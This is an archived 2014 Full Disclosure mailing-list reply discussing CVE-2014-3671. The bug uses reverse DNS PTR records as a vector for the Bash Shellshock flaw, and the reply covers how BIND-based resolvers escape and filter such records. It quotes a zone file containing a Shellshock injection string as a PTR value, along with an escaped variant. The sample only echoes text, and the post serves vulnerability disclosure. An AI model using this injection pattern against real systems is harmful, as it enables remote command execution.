[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <87d29u26z0.fsf@mid.deneb.enyo.de>
Date: Tue, 14 Oct 2014 14:04:03 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: Dirk-Willem van Gulik <dirkx@...weaving.org>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash
vulnerability (CVE-2014-6271 et.al.)
* Dirk-Willem van Gulik:
> Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem
> unaffected in their stock install as libc/libresolver and DNS use
> different escaping mechanisms (octal v.s. decimal).
More precisely, anything based on the historic BIND stub resolver code
(which is a lot) will escape certain characters while converting from
wire format to the textual representation, including "(", *and* also
has a check (res_hnok) which refuses PTR records which do not follow
the rather strict syntactic requirements for host names.
Lack of quoting in a DNS API at this point means that essentially
arbitrary garbage can leak into many other places, so this could well
expose vulnerabilities on such systems which are not present
elsewhere.
> A simple zone file; such as:
>
> $TTL 10;
> $ORIGIN in-addr.arpa.
> @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org (
> 666 ; serial
> 360 180 3600 1800 ; very short lifespan.
> )
> IN NS 127.0.0.1
> * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS"
I'm surprised DNS servers grok this, should be
* IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
Or something similar.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists